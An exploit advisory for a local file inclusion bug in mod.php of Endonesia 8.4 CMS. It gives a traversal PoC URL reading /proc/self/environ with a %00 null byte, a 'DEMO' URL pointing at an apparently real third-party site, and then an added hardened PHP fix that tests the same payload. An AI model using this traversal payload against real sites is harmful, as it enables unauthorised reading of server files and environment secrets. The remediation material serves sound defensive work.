[*] Endonesia 8.4 CMS
[*] Site: http://www.endonesia.org/
[*] Download: http://sourceforge.net/projects/endonesia
[*] Bug: Local File Inclusion in mod.php file !
[*] Author: s4r4d0
[*] Mail: s4r4d0@yahoo.com
[*] Team: Fatal Error
[*] Poc: http://www.site.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] DEMO: http://www.trubus-online.com/mod.php?mod=/../../../../../../proc/self/environ%00
[*] SecurityReason Note :
#
# Vulnerable Code in mod.php :
#
# include("./mod/$mod/index.php");
#
# magic_quotes = Off
#
# - sp3x
#
[*] Greetz: Elemento_pcx - z4i0n - D3UX - m4v3rick - HADES - Hualdo - Vympel - sp3x !
[*] Made in Brazil
[*] Reference: http://securityreason.com/exploitalert/7435
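
[*] Added example (not code from Endonesia or from the advisory): the include in mod.php rewritten so that the mod parameter cannot leave ./mod/. The helper name resolve_module(), the allowlist pattern and the temporary test directory are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for  include("./mod/$mod/index.php");
// resolve_module() is a hypothetical helper, not part of Endonesia.

function resolve_module($mod, $baseDir)
{
    // Request arrays (?mod[]=x) and other non-strings are rejected.
    if (!is_string($mod)) {
        return null;
    }
    // Allowlist the name. No "/", "\", "." or NUL byte can pass, so both the
    // traversal and the %00 truncation in the PoC fail here.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $mod)) {
        return null;
    }
    // Defence in depth: canonicalise (resolves symlinks) and require the
    // result to stay under the module directory.
    $base = realpath($baseDir);
    $target = ($base === false) ? false : realpath("$base/$mod/index.php");
    if ($target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// In mod.php the call site would become:
//   $path = resolve_module($_GET['mod'] ?? '', __DIR__ . '/mod');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;

// Self-check on constructed inputs (run with: php example.php).
$base = sys_get_temp_dir() . '/mod_demo_' . getmypid();
mkdir("$base/news", 0700, true);
file_put_contents("$base/news/index.php", "<?php // constructed module\n");

$samples = [
    'news',                                    // legitimate module
    "/../../../../../../proc/self/environ\0",  // decoded PoC value
    '../news',                                 // relative traversal
    'missing',                                 // well-formed, not installed
];
foreach ($samples as $s) {
    printf("%-48s %s\n", json_encode($s), resolve_module($s, $base) ? 'allowed' : 'rejected');
}
unlink("$base/news/index.php"); rmdir("$base/news"); rmdir($base); // remove demo files
```

PHP 5.3.4 and later refuse filesystem paths containing a NUL byte, which stops the %00 truncation on its own, but the unfiltered include can still be steered by traversal to any index.php on the host, so the allowlist is needed regardless of PHP version.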